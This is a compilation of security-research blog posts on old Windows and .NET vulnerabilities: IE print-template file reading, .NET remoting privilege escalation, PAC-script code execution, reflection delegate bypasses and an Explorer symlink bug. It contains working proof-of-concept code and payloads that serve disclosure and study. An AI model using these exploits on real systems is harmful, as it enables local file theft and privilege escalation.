<object border="1" classid="clsid:8856f961-340a-11d0-a96b-00c04fd705a2" id="obj">NO OBJECT</object>
<script>
try {
// Set document to a print template
var wb = document.getElementById("obj").object;
wb.ExecWB(51, 0, true);

// Enable print media mode
document.media = "print";

// Read a local file
var x = new ActiveXObject("msxml2.xmlhttp");
x.open("GET", "file:///c:/windows/win.ini", false);
x.send();
alert(x.responseText);

// Disable again to get scripting back (not really necessary)
document.media = "screen";

} catch(e) {
alert(e.message);
}
</script>
</body>
</html>
This example only work when running in the Intranet Zone because it requires the ability to script the web browser. Can it be done from Internet Zone? Probably ;-) In the end Microsoft classed this as an Information Disclosure, but is it? Well probably in a default installation of Windows. But mix in third-party ActiveX controls you have yourself the potential for RCE. Perhaps sit back with a cup of *Coffee* and think about what ActiveX controls might be interesting to play with ;-)

Stupid is as Stupid Does When It Comes to .NET Remoting

$
0
0
Finding vulnerabilities in .NET is something I quite enjoy, it generally meets my criteria of only looking for logic bugs. Probably the first research I did was into .NET serialization where I got some interesting results, and my first Blackhat USA presentation slot. One of the places where you could abuse serialization was in .NET remoting, which is a technology similar to Java RMI or CORBA to access .NET objects remotely (or on the same machine using IPC). Microsoft consider it a legacy technology and you shouldn't use it, but that won't stop people.

One day I came to the realisation that while I'd talked about how dangerous it was I'd never released any public PoC for exploiting it. So I decided to start writing a simple tool to exploit vulnerable servers, that was my first mistake. As I wanted to fully understand remoting to write the best tool possible I decided to open my copy of Reflector, that was my second mistake. I then looked at the code, sadly that was my last mistake.

TL;DR you can just grab the tool and play. If you want a few of the sordid details of CVE-2014-1806 and CVE-2014-4149 then read on.

.NET Remoting Overview

Before I can describe what the bug is I need to describe how .NET remoting works a little bit. Remoting was built into the .NET framework from the very beginning. It supports a pluggable architecture where you can replace many of the pieces, but I'm just going to concentrate on the basic implementation and what's important from the perspective of the bug. MSDN has plenty of resources which go into a bit more depth and there's always the official documentation MS-NRTP and MS-NRBF. A good description is available here.

The basics of .NET remoting is you have a server class which is derived from the MarshalByRefObject class.  This indicates to the .NET framework that this object can be called remotely. The server code can publish this server object using the remoting APIs such as RemotingConfiguration.RegisterWellKnownServiceType. On the client side a call can be made to APIs such as Activator.GetObject which will establish a transparent proxy for the Client. When the Client makes a call on this proxy the method information and parameters is packaged up into an object which implements the IMethodCallMessage interface. This object is sent to the server which processes the message, calls the real method and returns the return value (or exception) inside an object which implements the IMethodReturnMessage interface.

When a remoting session is constructed we need to create a couple of Channels, a Client Channel for the client and a Server Channel for the server. Each channel contains a number of pluggable components called sinks. A simple example is shown below:


The transport sinks are unimportant for the vulnerability. These sinks are used to actually transport the data in some form, for example as binary over TCP. The important things to concentrate on from the perspective of the vulnerabilities are the Formatter Sinks and the StackBuilder Sink.

Formatter Sinks take the IMethodCallMessage or IMethodReturnMessage objects and format their contents so that I can be sent across the transport. It's also responsible for unpacking the result at the other side. As the operations are asymmetric from the channel perspective there are two different formatter sinks, IClientChannelSink and IServerChannelSink.

While you can select your own formatter sink the framework will almost always give you a formatter based on the BinaryFormatter object which as we know can be pretty dangerous due to the potential for deserialization bugs. The client sink is implemented in BinaryClientFormatterSink and the server sink is BinaryServerFormatterSink.

The StackBuilder sink is an internal only class implemented by the framework for the server. It's job is to unpack the IMethodCallMessage information, find the destination server object to call, verify the security of the call, calling the server and finally packaging up the return value into the IMethodReturnMessage object.

This is a very high level overview, but we'll see how this all interacts soon.

The Exploit

Okay so on to the actual vulnerability itself, let's take a look at how the BinaryServerFormatterSink processes the initial .NET remoting request from the client in the ProcessMessage method:

IMessage requestMsg;

if (this.TypeFilterLevel != TypeFilterLevel.Full)
{
set = new PermissionSet(PermissionState.None);
set.SetPermission(
new SecurityPermission(SecurityPermissionFlag.SerializationFormatter));
}
try
{
if (set != null)
{
set.PermitOnly();
}
requestMsg = CoreChannel.DeserializeBinaryRequestMessage(uRI, requestStream,
_strictBinding, TypeFilterLevel);
}
finally
{
if (set != null)
{
CodeAccessPermission.RevertPermitOnly();
}
}
We can see in this code that the request data from the transport is thrown into the DeserializeBinaryRequestMessage. The code around it is related to the serialization type filter level which I'll describe later. So what's the method doing?
internal static IMessage DeserializeBinaryRequestMessage(string objectUri, 
Stream inputStream, bool bStrictBinding, TypeFilterLevel securityLevel)
{
BinaryFormatter formatter = CreateBinaryFormatter(false, bStrictBinding);
formatter.FilterLevel = securityLevel;
UriHeaderHandler handler = new UriHeaderHandler(objectUri);
return (IMessage) formatter.UnsafeDeserialize(inputStream,
new HeaderHandler(handler.HeaderHandler));
}

For all intents and purposes it isn't doing a lot. It's passing the request stream to a BinaryFormatter and returning the result. The result is cast to an IMessage interface and the object is passed on for further processing. Eventually it ends up passing the message to the StackBuilder sink, which verifies the method being called is valid then executes it. Any result is passed back to the client.

So now for the bug, it turns out that nothing checked that the result of the deserialization was a local object. Could we instead insert a remote IMethodCallMessage object into the serialized stream? It turns out yes we can. Serializing an object which implements the interface but also derived from MarshalByRefObject serializes an instance of an ObjRef class which points back to the client.

But why would this be useful? Well it turns out there's a Time-of-Check Time-of-Use vulnerability if an attacker could return different results for the MethodBase property. By returning a MethodBase for Object.ToString (which is always allowed) as some points it will trick the server into dispatching the call. Now once the StackBuilder sink goes to dispatch the method we replace it with something more dangerous, say Process.Start instead. And you've just got arbitrary code to execute in the remoting service.

In order to actually exploit this you pretty much need to implement most of the remoting code manually, fortunately it is documented so that doesn't take very long. You can repurpose the existing .NET BinaryFormatter code to do most of the other work for you. I'd recommand taking a look at the github project for more information on how this all works.

So that was  CVE-2014-1806, but what about CVE-2014-4149? Well it's the same bug, MS didn't fix the TOCTOU issue, instead they added a call to RemotingServices.IsTransparentProxy just after the deserialization. Unfortunately that isn't the only way you can get a remote object from deserialization. .NET supports quite extensive COM Interop and as luck would have it all the IMessage interfaces are COM accessible. So instead of a remoting object we instead inject a COM implementation of the IMethodCallMessage interface (which ironically can be written in .NET anyway). This works best locally as they you don't need to worry so much about COM authentication but it should work remotely. The final fix was to check if the object returned is an instance of MarshalByRefObject, as it turns out that the transparent COM object, System.__ComObject is derived from that class as well as transparent proxies.

Of course if the service is running with a TypeFilterLevel set to Full then even with these fixes the service can still be vulnerable. In this case you can deserialize anything you like in the initial remoting request to the server. Then using reflecting object tricks you can capture FileInfo or DirectoryInfo objects which give access to the filesystem at the privileges of the server. The reason you can do this is these objects are both serializable and derive from MarshalByRefObject. So you can send them to the server serialized, but when the server tries to reflect them back to the client it ends up staying in the server as a remote object.

Real-World Example

Okay let's see this in action in a real world application. I bought a computer a few years back which had pre-installed the Intel Rapid Storage Technology drivers version 11.0.0.1032 (the specific version can be downloaded here). This contains a vulnerable .NET remoting server which we can exploit locally to get local system privileges. A note before I continue, from what I can tell the latest versions of these drivers no longer uses .NET remoting for the communication between the user client and the server so I've never contacted Intel about the issue. That said there's no automatic update process so if, like me you had the original insecure version installed well you have a trivial local privilege escalation on your machine :-(

Bringing up Reflector and opening the IAStorDataMgrSvc.exe application (which is the local service) we can find the server side of the remoting code below:

public void Start()
{
BinaryServerFormatterSinkProvider serverSinkProvider
new BinaryServerFormatterSinkProvider {
TypeFilterLevel = TypeFilterLevel.Full
};
BinaryClientFormatterSinkProvider clientSinkProvider = new BinaryClientFormatterSinkProvider();
IdentityReferenceCollection groups = new IdentityReferenceCollection();

IDictionary properties = new Hashtable();
properties["portName"] = "ServerChannel";
properties["includeVersions"] = "false";
mChannel = new IpcChannel(properties, clientSinkProvider, serverSinkProvider);
ChannelServices.RegisterChannel(mChannel, true);
mServerRemotingRef = RemotingServices.Marshal(mServer,
"Server.rem", typeof(IServer));
mEngine.Start();
}

So there's a few thing to note about this code, it is using IpcChannel so it's going over named pipes (reasonable for a local service). It's setting the portName to ServerChannel, this is the name of the named pipe on the local system. It then registers the channel with the secure flag set to True and finally it configures an object with the known name of Server.rem which will be exposed on the channel. Also worth nothing it is setting the TypeFilterLevel to Full, we'll get back to that in a minute.

For exploitation purposes therefore we can build the service URL as ipc://ServerChannel/Server.rem. So let's try sending it a command. In this case I had updated for the fix to CVE-2014-1806 but not for CVE-2014-4149 so we need to pass the -usecom flag to use a COM return channel.


Well that was easy, direct code execution at local system privileges. But of course if we now update to the latest version it will stop working again. Fortunately though I highlighted that they were setting the TypeFilterLevel to Full. This means we can still attack it using arbitrary deserialization. So let's try and do that instead:


In this case we know the service's directory and can upload our custom remoting server to the same directory the server executes from. This allows us to get full access to the system. Of course if we don't know where the server is we can still use the -useser flag to list and modify the file system (with the privileges of the server) so it might still be possible to exploit even if we don't know where the server is running from.

Mitigating Against Attacks

I can't be 100% certain there aren't other ways of exploiting this sort of bug, at the least I can't rule out bypassing the TypeFilterLevel stuff through one trick or another. Still there are definitely a few ways of mitigating it. One is to not use remoting, MS has deprecated the technology for WCF, but it isn't getting rid of it yet.

If you have to use remoting you could use secure mode with user account checking. Also if you have complete control over the environment you could randomise the service name per-deployment which would at least prevent mass exploitation. An outbound firewall would also come in handy to block outgoing back channels. 


Old .NET Vulnerability #1: PAC Script RCE (CVE-2012-4776)

$
0
0
This is the start of a very short series on some of my old .NET vulnerabilities which have been patched. Most of these issues have never been publicly documented, or at least there have been no PoCs made available. Hopefully it's interesting to some people.

The first vulnerability I'm going to talk about is CVE-2012-4776 which was fixed in MS12-074. It was an issue in the handling of Web Proxy Auto-Configuration scripts (PAC). It was one of the only times that MS has ever credited me with a RCE in .NET since they made it harder to execute .NET code from IE. Though to be fair making it harder might be partially my fault.

The purpose of a PAC script, if you've never encountered one before, is to allow a web client to run some proxy decision logic before it connects to a web server. An administrator can configure the script to make complex decisions on how outbound connections are made, for example forcing all external web sites through a gateway proxy but all Intranet connections go direct to the server. You can read all about it on Wikipedia and many other sites as well but the crucial thing to bear in mind is the PAC script is written in Javascript. The most basic PAC script you can create is as follows:
function FindProxyForURL(url, host) {
// Always return no proxy setting
return "DIRECT";
}
On Windows if you use the built-in HTTP libraries such as WinINET and WinHTTP you don't need to worry about these files yourself, but if you roll your own HTTP stack, like .NET does, you'd be on your own to reimplement this functionality. So when faced with this problem what to do? If you answered, "let's use a .NET implementation of Javascript" you'd be correct. Some people don't realise that .NET comes with its own implementation of Javascript (JScript for licensing reasons). It even comes with a compiler, jsc.exe, installed by default.

While I was having a look at .NET, evaluating anything interesting which asserts full trust permissions I came across the .NET PAC implementation. The following method is from the System.Net.VsaWebProxyScript class in the Microsoft.JScript assembly (some code removed for brevity):
[PermissionSet(SecurityAction.Assert, Name="FullTrust")]
public bool Load(Uri engineScriptLocation, string scriptBody, Type helperType)
{
try
{
engine = new VsaEngine();
engine.RootMoniker = "pac-" + engineScriptLocation.ToString();
engine.Site = new VsaEngineSite(helperType);
engine.InitNew();
engine.RootNamespace = "__WebProxyScript";

StringBuilder sb = new StringBuilder();
sb.Append("[assembly:System.Security.SecurityTransparent()] ...");
sb.Append("class __WebProxyScript { ... }\r\n");
sb.Append(scriptBody);
IVsaCodeItem item2 = engine.Items.CreateItem("SourceText",
VsaItemType.Code, VsaItemFlag.None) as IVsaCodeItem;
item2.SourceText = sb.ToString();

if (engine.Compile())
{
engine.Run();
scriptInstance = Activator.CreateInstance(
engine.Assembly.GetType("__WebProxyScript.__WebProxyScript"));
CallMethod(scriptInstance, "SetEngine", new object[] { engine });
return true;
}
}
catch
{
}
return false;
}
The code is taking the PAC script from the remote location as a string, putting it together with some boiler plate code to implement the standard PAC functions and compiling it to an assembly. This seems too good to be true from an exploit perspective. It was time to give it a try so I configured a simple .NET application with a PAC script by adding the following configuration to the application:
<configuration>
<system.net>
<defaultProxy>
<proxy
autoDetect="true"
scriptLocation="http://127.0.0.1/test.js"
/>
</defaultProxy>
</system.net>
</configuration
Of course in a real-world scenario the application probably isn't going to be configured like this. Instead the proxy settings might be configured through WPAD, which is known to be spoofable or the system settings. When the application makes a connection using the System.Net.WebClient class it will load the PAC file from the scriptLocation and execute it. With a test harness ready let's try a few things:
import System;

function FindProxyForURL(url, host) {
Console.WriteLine("Hello World!");
return "DIRECT";
}
This printed out "Hello World!" as you'd expect, so we can compile and executing JScript.NET code. Awesome. So let's go for the win!
import System.IO;

function FindProxyForURL(url, host) {
File.WriteAllText("test.txt", "Hello World!");
return "DIRECT";
}
And... it fails, silently I might add :-( I guess we need to get to the bottom of this. When dealing with the internals of the framework I usually find it easiest to get WinDBG involved. All .NET frameworks come with a handy debugger extension, SOS, which we can use to do low-level debugging of .NET code. A quick tutorial, open the .NET executable in WinDBG and run the following two lines at the console.
sxe clr
sxe -c ".loadby sos mscorwks; gh" ld:mscorwks
What these lines do is set WinDBG to stop on a CLR exception (.NET uses Windows SEH under the hood to pass on exceptions) and adds a handler to load the SOS library when the DLL mscorwks gets loaded. This DLL is the main part of the CLR, we can't actually do any .NET debugging until the CLR is started. As a side note, if this was .NET 4 and above replace mscorwks with clr as that framework uses clr.dll as its main implementation.

Restarting the execution of the application we wait for the debugger to break on the CLR exception. Once we've broken into the debugger you can use the SOS command !pe to dump the current exception:


Well no surprises, we got a SecurityException trying to open the file we specified. Now at this point it's clear that the PAC script must be running in Partial Trust (PT). This isn't necessarily an issue as I still had a few PT escapes to hand, but would be nice not to need one. By dumping the call stack using the !clrstack command we can see that the original caller was System.Net.AutoWebProxyScriptWrapper. 

Looking at the class it confirms our suspicions of being run in PT. In the class'CreateAppDomain method it creates an Internet security AppDomain which is going to be pretty limited in permissions then initializes the System.Net.VsaWebProxyScript object inside it. As that class derives from MarshalByRefObject it doesn't leave the restricted AppDomain. Still in situations like this you shouldn't be disheartened, let's go back and look at how the assembly was being loaded into memory. We find it's being loaded from a byte array (maybe bad) but passing a null for the evidence parameter (awesome). As we can see in the remarks from Assembly.Load this is a problem:
When you use a Load method overload with a Byte[] parameter to load a COFF image, 
evidence is inherited from the calling assembly. This applies to the .NET Framework 
version 1.1 Service Pack 1 (SP1) and subsequent releases.
So what we end up with is an assembly which inherits its permissions from the calling assembly. The calling assembly is trusted framework code, which means our compiled PAC code is also trusted code. So why doesn't the file function work? Well you have to remember how security in AppDomains interact with the security stack walk when a demand for a permission is requested.

The transition between the trusted and the untrusted AppDomains acts as a PermitOnly security boundary. What this means is that even if every caller on the current stack is trusted, if no-one asserts higher permissions than the AppDomain's current set then a demand would fail as shown in the below diagram:



There are plenty of ways around this situation, in fact we'll see a few in my next post on this topic. But for now there's an easy way past this issue, all we need is something to assert suitable permissions for us while we run our code. Turns out it was there all along, the original Load method uses the attribute form of permission assertion to assert full trust.
[PermissionSet(SecurityAction.Assert, Name="FullTrust")]
We can get code to run in that method because the loading of the assembly will execute any global JScript code automatically, so a quick modification and we get privileged execution:
import System.IO;

File.WriteAllText("test.txt", "Hello World!");

function FindProxyForURL(url, host) {
return "DIRECT";
}
Why couldn't we have just done a new PermissionSet(PermissionState.Unrestricted).Assert() here? Well if you look at the code being generated for compilation it sets the SecurityTransparent assembly attribute. This tells the CLR that this code isn't allowed to elevate its permissions, but it's transparent to security decisions. If you have a trusted assembly which is transparent it doesn't effect the stack walk at all, but it also cannot assert higher permissions. This is why the assertion in the Load method was so important. Of course this assertion was what originally led me to finding the code in the first place.

Microsoft fixed this in two ways, first they "fixed" the JScript code to not execute under a privileged permission set as well as passing an appropriate evidence object to the Assembly load. And secondly they basically blocked use of JScript.NET by default (see the notes in the KB article here). If you ever find a custom implementation of PAC scripts in an application it's always worth a quick look to see what they're using.


Old .NET Vulnerability #2+3: Reflection Delegate Binding Bypass (CVE-2012-1895 and CVE-2013-3132)

$
0
0
Reflection is a very useful feature of frameworks such as .NET and Java, but it has interesting security issues when you're trying to sandbox code. One which is well known is how much the framework will try to emulate the normal caller visibility scoping for reflection APIs which would exist if the code was compiled. Perhaps that needs a bit of explanation, imagine you have a C# class which looks something like the following:
public class UnsafeMemory {
IntPtr _ptr;
ushort _size;

public UnsafeMemory(ushort size) {
_ptr = Marshal.AllocCoTaskMem(size);
_size = size;
}

public byte ReadByte(ushort ofs) {
if (ofs < _size) {
return Marshal.ReadByte(_ptr, ofs);
}

return 0;
}
}

This has a sensitive field, a pointer to a locally allocated memory structure which we don't want people to change. The built-in accessors don't allow you to specify anything other than size (which is also sensitive, but slightly less so). Still reflection allows us to change this from a fully trusted application easily enough:
UnsafeMemory mem = new UnsafeMemory(1000);
FieldInfo fi = typeof(UnsafeMemory).GetField("_ptr",
BindingFlags.NonPublic | BindingFlags.Instance);

fi.SetValue(mem, new IntPtr(0x12345678));

As we've set the pointer, we can now read and write to arbitrary memory addresses. Flushed with success we try this in our partially trusted application and we get:
System.FieldAccessException: Attempt by method 
ReflectionTests.Program.Main()' to
access field 'ReflectionTests.UnsafeMemory._ptr' failed.
at System.Reflection.RtFieldInfo.PerformVisibilityCheckOnField()
at System.Reflection.RtFieldInfo.InternalSetValue()
at System.Reflection.RtFieldInfo.SetValue()
at System.Reflection.FieldInfo.SetValue()
at ReflectionTests.Program.Main()

Well that sucks! PerformVisibilityCheckOnField is implemented by the CLR so we can't easily look at it's implementation (although it's in the SSCLI). But I think we can guess what the method is doing. The CLR is checking who's calling the SetValue method and verifying the visibility rules for the field. As the field is private only the declaring class should be able to set it via reflection, we can verify that easily enough. Let's modify the class slightly to add a new method:
public static void TestReflection(FieldInfo fi, object @this, object value) {
fi.SetValue(@this, value);
}

If we call that method from our partial trust code it succeeds, thus confirming our assumptions about the visibility check. This can be extended to any reflection artefact, properties, methods, constructors, events etc. Still the example method is hardly going to be a very common coding pattern, so instead let's think more generally about visibility in the .NET framework to see if we can find a case where we can easily bypass the visibility.  There are actually many different visibility levels in the CLR which can be summarised as:
Name in CLRName in C#Visibility
PublicpublicAnybody
FamilyprotectedCurrent class and derived classes
FamilyAndAssemblyNo EquivalentCurrent class or derived classes in same assembly
FamilyOrAssemblyprotected internalCurrent class and derived classes or assembly
AssemblyinternalCurrent assembly
PrivateprivateCurrent class

Of most interest is Assembly (or internal in C#) as you only have to take a quick peek at something like mscorlib to see that this visibility is used a lot to protect sensitive classes and methods by localizing them to the current assembly. The Assembly visibility rule means that any class in the same assembly can access the field or method. When dealing with something like mscorlib, which has at least 900 public classes you can imagine that would give you something you could exploit. Turns out a good one to look at is the handling of delegates, if only for one reason, you can get them to call a method with the caller set to a something in mscorlib, by using asynchronous dispatch.

For example if we run the following code we can get the calling method from the delegate, this correctly removes methods which the CLR considers to be part of the delegate dispatch.
Func<MethodBase> f = new Func<MethodBase>(() => 
new StackTrace().GetFrame(1).GetMethod());
MethodBase method = f();

Console.WriteLine("{0}::{1}", method.DeclaringType.FullName, method.Name);

OUTPUT: ReflectionTests.Program::Main

Not really surprising, the caller was our Main method. Okay now what if we change that to using asynchronous dispatch, using BeginInvoke and EndInvoke?
Func<MethodBase> f = new Func<MethodBase>(() => 
new StackTrace().GetFrame(1).GetMethod());

IAsyncResult ar = f.BeginInvoke(null, null);
MethodBase method = f.EndInvoke(ar);

Console.WriteLine("{0}::{1}", method.DeclaringType.FullName, method.Name);

OUTPUT: System.Runtime.Remoting.Messaging.StackBuilderSink::_PrivateProcessMessage

How interesting, the code thinks the caller's an internal method to mscorlib, hopefully you can see where I'm going with this? Okay let's put it all together, lets create a delegate pointing to FieldInfo.SetValue, call it via asynchronous dispatch and it's time to party.
Action<object, object> set_info = new Action<object,object>(fi.SetValue);

IAsyncResult ar = set_info.BeginInvoke(mem, new IntPtr(0x12345678), null, null);
set_info.EndInvoke(ar);

This works as expected with full trust but running it under partial trust we get the dreaded SecurityException
System.Security.SecurityException: Request for the permission 
of type 'System.Security.Permissions.ReflectionPermission' failed.
at System.Delegate.DelegateConstruct()
at ReflectionTests.Program.Main()

So why is this the case. Well the developers of .NET weren't stupid, they realised being able to call a reflection API using another reflection API (which delegates effectively are) is a security hole waiting to happen. So if you try and bind a delegate to certain set of methods it will demand ReflectionPermission first to check if you're allowed to do it. Still while I said they weren't stupid, I didn't mean they don't mistakes as this is the crux of the two vulnerabilities I started writing this blog post about :-)

The problem comes down to this, what methods you can or cannot bind to are just a black-list. Each method is allocated a set of invocation flags represented by the System.Reflection.INVOCATION_FLAGS enumeration. Perhaps the most important one from our perspective is the INVOCATION_FLAGS_FIELD_SPECIAL_CAST flag. This is a bit strangely named, but what this indicates is the method should be double checked if it's ever invoked through a reflection API. If we look at FieldInfo.SetValue we'll find it has the flag set.

Okay so the challenge is simple, just find a method which is equivalent to SetValue but isn't FieldInfo.SetValue. It turns out that FieldInfo implements the interface System.Runtime.InteropServices._FieldInfo which is a COM interface for accessing the FieldInfo object. It just so happened that someone forgot to add this interface's methods to the blacklist. So let's see a real PoC by abusing the WeakReference class and its internalm_handle field:
// Create a weak reference to 'tweak'
string s = "tweakme";
WeakReference weakRef = new WeakReference(s);

// Get field info for GC handle
FieldInfo f = typeof(WeakReference).GetField("m_handle",
BindingFlags.NonPublic | BindingFlags.Instance);

MethodInfo miSetValue = typeof(_FieldInfo).GetMethod("SetValue",
BindingFlags.Public | BindingFlags.Instance, null,
new Type[2] { typeof(object), typeof(object) }, null);

Action<object, object> setValue = (Action<object, object>)
Delegate.CreateDelegate(typeof(Action<object, object>),
f, miSetValue);

// Set garbage value in handle
setValue.EndInvoke(setValue.BeginInvoke(weakRef,
new IntPtr(0x0c0c0c0c), null, null));

// Crash here read AV on 0x0c0c0c0c
Console.WriteLine(weakRef.Target.ToString());

CVE-2014-1895 described the issue with all similar COM interfaces, such as _MethodInfo, _Assembly, _AppDomain. So I sent it over to MS and it was fixed. But of course even though you point out a security weakness in one part of the code it doesn't necessarily follow that they'll fix it everywhere. So a few months later I found that the IReflect interface has an InvokeMember method which was similarly vulnerable. This ended up as CVE-2013-3132, by that point I gave up looking :-)

As a final note there was a similar issue which never got a CVE, although it was fixed. You could exploit it using something like the following:
MethodInfo mi = typeof(Delegate).GetMethod("CreateDelegate", 
BindingFlags.Public | BindingFlags.Static,
null, new Type[] { typeof(Type), typeof(MethodInfo) }, null);

Func<Type, MethodInfo, Delegate> func = (Func<Type, MethodInfo, Delegate>)
Delegate.CreateDelegate(typeof(Func<Type, MethodInfo, Delegate>), mi);

Type marshalType = Type.GetType("System.Runtime.InteropServices.Marshal");
MethodInfo readByte = marshalType.GetMethod("ReadByte",
BindingFlags.Public | BindingFlags.Static,
null, new Type[] { typeof(IntPtr) }, null);

IAsyncResult ar = func.BeginInvoke(typeof(Func<IntPtr, byte>), readByte, null, null);
Func<IntPtr, byte> r = (Func<IntPtr, byte>)func.EndInvoke(ar);

r(new IntPtr(0x12345678));

It's left as an exercise for the reader to understand why that works (hint: it isn't a scope issue as Marshal.ReadByte is public). I'll describe it in more detail next time.

Starting WebClient Service Programmatically

$
0
0
I've been asked how you can start the WebClient service on Windows 7+ programmatically, specifically in relation to this issue. If you try and start it manually (say using the sc tool) as a normal user you'll find you get access denied. However the service is actually registered with a service trigger, so it'll be started automatically in response to a specific system event.

We can dump the trigger information for the service using the command sc qtriggerinfo WebClient which gives us:
START SERVICE
CUSTOM : 22b6d684-fa63-4578-87c9-effcbe6643c7 [ETW PROVIDER UUID]
This indicates that the service trigger is a custom ETW event trigger with the specified provider UUID. So all we need to do is write an event using that trigger as a normal user and we'll get the WebClient service to start. So something like:
bool StartWebClientService()
{
const GUID _MS_Windows_WebClntLookupServiceTrigger_Provider =
{ 0x22B6D684, 0xFA63, 0x4578,
{ 0x87, 0xC9, 0xEF, 0xFC, 0xBE, 0x66, 0x43, 0xC7 } };
REGHANDLE Handle;
bool success = false;

if (EventRegister(&_MS_Windows_WebClntLookupServiceTrigger_Provider,
nullptr, nullptr, &Handle) == ERROR_SUCCESS)
{
EVENT_DESCRIPTOR desc;

EventDescCreate(&desc, 1, 0, 0, 4, 0, 0, 0);

success = EventWrite(Handle, &desc, 0, nullptr) == ERROR_SUCCESS;

EventUnregister(Handle);
}

return success;
}
I haven't tested this from all locations but you can almost certainly cause this trigger to run even from a heavily restrictive sandbox such as Chrome or EPM.

Tracking Down the Root Cause of a Windows File Handling Bug

$
0
0
This blog post is about a bug in the Windows Explorer shell (useless from a security perspective I believe) that I thought I'd document. I'll explain the bug then go through how I tracked down the code responsible for the bug. Hopefully it serves as a brief tutorial on how you'd go about doing the same thing for other issues.

The Bug

The Windows Explorer shell has supported the concept of Shortcut files for as long as it's been around. These are your traditional LNK files. The underlying Windows operating system has no concept of these as being shortcuts to other files, it's all treated specially by Explorer. 

Since Vista the shell has supported another link format, NTFS symbolic links. You might think I'm slightly crazy at this point, surely symbolic links are just treated as an other file which would just happen to point to another file? While that would make more sense it seems that the developers in Explorer really did implement special support, and no only that they got it wrong as we'll see with this bug.

NTFS Symbolic Links use the Reparse Point feature of NTFS to change a file or directory into a symbolic link which the kernel will follow when opening the file. Under the hood the data structure set in the Reparse Point looks like the following:

typedefstruct_REPARSE_DATA_BUFFER{ULONGReparseTag;USHORTReparseDataLength;USHORTReserved;USHORTSubstituteNameOffset;USHORTSubstituteNameLength;USHORTPrintNameOffset;USHORTPrintNameLength;ULONGFlags;WCHARPathBuffer[1];}REPARSE_DATA_BUFFER,*PREPARSE_DATA_BUFFER;


This is a variable length structure and contains two strings, the Substitute Name and the Print Name. Why two names? Well the first the native NT path which represents the target of the symbolic link, this will be something like \??\C:\TargetFile. While the Print Name is normally set to what the user "thinks" the path is, so in this case C:\TargetFile. The rationale behind this is the NT name is ugly and somewhat unexpected for a user so if a program has to show the target the Print Name shows what the user might expect. However there's no requirement for these two to match in anyway. We can test this out using my Symbolic Link Testing Tools (available on Github here). The CreateNtfsSymbolicLink tool allows you to specify an arbitrary Print Name value (which the built-in MKLINK tool does not). Let's try it out (note you need to be an administrator):


Nothing too surprising, both links point to cmd.exe, but for the second one I've changed the Print Name to point to calc.exe instead. You can see the Print Names by just doing a directory listing. If you execute these files from the shell you'll find they both run cmd.exe as shown in the screenshot.

Now let's look at these files in the Explorer shell:

Hopefully you can immediately see the problem? And it's not just the icons, if you double click in Explorer link1.exe you get cmd.exe, link2.exe instead runs calc.exe. Whoops. It's pretty clear that the shell must be explicitly handling NTFS Symbolic Links as if they are Shortcut files and then picking the Print Name over the actual target file in the link. 

This feature does have some nice properties, for example the symbolic link can have any extension you like, so your link can have a .pdf extension but double clicking it will run cmd.exe (regardless of the extension you use). But then you could do that anyway with a LNK file as Explorer removes the .lnk extension. It might have been useful to attack a sandbox which calls ShellExecute on a file, but first checks the file name extension for allowed files. However as you need Administrator privileges to use this it's not especially useful in practice.

Tracking Down the Root Cause

Okay so we can guess what it's doing, at least let's track down the buggy code just to confirm it. We'd probably want to do this if we were sending an actual bug report to Microsoft (which I'm not of course, but they're more than welcome to fix a 9 year old bug if they like). Whenever I encounter a file based issue my go to is Process Monitor to find out the code responsible for handling the file contents.

To aid in this we need to configure Process Monitor to support symbol loading which you can do through the menu Options > Configure Symbols. If you go there you'll see the following dialog:

You'd assume that everything is already set-up for you, but if you try and get a stack trace from a monitored event you'll be disappointed. The version of the dbghelp library which ships with Windows (even Windows 10) doesn't support pulling symbols from a remote symbol server, so it's only useful for applications you've compiled yourself. We can remedy that though by installing WinDBG from the SDK or WDK and using it's copy of dbghelp.dll. If you've installed the Windows 10 SDK then you'll find it under %PROGRAMFILES(x86)%\Windows Kits\10\Debuggers\x64 for 64 bit platforms. Select the DLL and you should be good to go.

So we can set a filter on link2.exe and see what's processing it, we're primarily looking for an event doing a FileSystemControl operation to read the Reparse Point data with FSCTL_GET_REPARSE_POINT


Okay good the expected event is there, now if we open that event we can look at the stack tab see the culprit.


Well CShellLink::_LoadFromSymLink sounds very much like the culprit we're looking for, it's the last call before going into DeviceIoControl which ends up reading the Reparse Point information. Let's finally confirm by disassembling windows.storage.dll it in your application of choice. If you use IDA Pro it should try and load the public symbol file using the DIA library. We end up with something which looks like:

HRESULTCShellLink::_LoadFromSymLink(LPCWSTRpszInputPath){PREPARSE_DATA_BUFFERReparseBuffer=// Allocate reparse buffer HANDLEhFile=CreateFileW(pszInputPath,FILE_READ_EA,...,FILE_FLAG_OPEN_REPARSE_POINT);size_tPathLength=0;offset_tPathOffset=NULL;WCHARpszPath[MAX_PATH];if(hFile!=INVALID_HANDLE_VALUE){DeviceIoControl(hFile,FSCTL_GET_REPARSE_POINT,0,0,ReparseBuffer,...);if(ReparseBuffer->ReparseTag==IO_REPARSE_TAG_SYMLINK){PathLength=ReparseBuffer->PrintNameLength>>1;PathOffset=(ReparseBuffer->PrintNameOffset>>1)+10;}elseif(ReparseBuffer->ReparseTag==IO_REPARSE_TAG_MOUNT_POINT){PathLength=ReparseBuffer->PrintNameLength>>1;PathOffset=(ReparseBuffer->PrintNameOffset>>1)+8;}else{returnE_FAIL;}StringCchCopyN(pszPath,MAX_PATH,(WCHAR*)ReparseBuffer+PathOffset,PathLength);_SetSimplePIDL(&pszPath);_ResetDirty();}returnS_OK;}

We can see the bug here pretty clearly, it's using the PrintName value. I guess it might be intentional as you can see this code also supports normal mount points and has the same issue. Fortunately for mount points there seems to be no way of directly tricking Explorer to parse the directory as anything else, but this might only trick another application which uses the ShellLink CoClass directly.

Anyway I hope this is useful as a very brief tutorial on how to find where vulnerable code lies in Windows, at least when dealing with files. It's a shame that this bug wasn't more serious, but fortunately the fact that Symbolic Links need administrator permissions might have worked in Microsoft's favour. 

Getting Code Execution on Windows by Abusing Default Kernel Debugging Setting

$
0
0
TL;DR; This blog post comes from an on-site pentest I did a long time ago. While waiting for some other testing to complete the customer was interested to see if I could get code execution on one of their Windows workstations (the reasons for this request are unimportant). Needless to say I had physical access to the workstation so it should be pretty simple thing to achieve. The solution I came up with abused the default Windows Kernel Debugging settings to get arbitrary code execution without needing to permanently modify the system configuration or open the case.

The advantage of this technique is it requires a minimum amount of kit which you could bring with you on a job, just in case. However it does require that the target has an enabled COM1 serial port which isn't necessarily guaranteed, and the machine cannot be using TPM enforced Bitlocker or similar.

